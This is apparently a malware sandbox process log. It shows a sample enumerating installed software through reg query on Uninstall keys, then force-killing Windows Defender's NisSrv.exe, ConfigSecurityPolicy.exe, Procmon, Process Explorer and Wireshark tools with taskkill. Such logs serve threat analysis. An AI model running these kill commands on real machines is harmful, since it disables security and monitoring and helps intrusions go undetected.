C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1460
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4168
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:4720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:4392
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:3280
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:3616
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:4580
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4328
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:4472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:4576
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:4620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:4752
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:4056
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2568
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:500
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:3292
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1344
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4148
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:4292
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4404
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:3792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:616
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4648
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵PID:4476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵PID:4664
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4896
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵PID:4612
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵PID:4532
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:4900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:3612
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:4888
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:4520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:4544
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4700
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1936
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:4216
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:4288
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1060
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:4684
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:5028
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:4752
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:4744
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:4416
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:616
-